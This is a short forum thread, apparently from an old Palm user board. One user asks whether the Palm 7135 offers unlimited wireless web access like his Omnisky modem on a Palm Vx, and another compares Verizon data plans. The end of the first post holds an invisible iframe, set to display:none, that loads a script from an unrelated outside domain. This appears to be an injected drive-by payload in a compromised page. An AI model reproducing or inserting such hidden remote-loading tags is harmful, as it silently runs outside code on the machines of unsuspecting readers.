+ Reply to Thread

Palm w/ wireless modem, what happens with the 7135?

Hello all.
    I have been a diehard follower of palm since the days in the early 90's when the palm personal edition was something impressive. I too carry a cell and palm and would put to use many of the versatile functions of the 7135 (provided all the functions actually work the way they claim). For me however, one of the most valuable features I have on my Vx is the wireless minstrel modem from at the time Omnisky, now Earthlink service. I pay a service fee for the year and enjoy unlimited queries and websurfing anywhere around the country (provided there is a clear CDMA cellular signal present).
    Finally, my question is this. What is to be said of the web services currently available for the 7135 that are not on a minute deducting or query counting (limited) basis? I have gotten spoiled by the unrestricted parameters which I explored frequently and on a daily basis with my current service. If I will have no other choice than to pay per query or per minute every time I use the web services on the 7135 then I will certainly be reticent about the purchase and most likely not take the plunge to do it before they offer the service I want.
    Can anyone relate to this old fashioned luxury?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I can. I used to have the Omnisky with my Vx. It was great for surfing and checking e-mail and the one fee for unlimited use was great. I now have the 7135. VZW does not have any deals as good as what you have now. If you use the regular network, it is slow and comes off your minutes. If you use the Express Network, it is faster but more expensive. Depending on the deal, you can get unlimited for $99/month, 10MB for $35/month or have it come off your regular minutes (only with certain plans). However, the 7135 has the Vx and modem beat every other way. So, I can relate to your old fashioned luxury, but I'm happy I swapped for the new luxury of the 7135 and all it has to offer.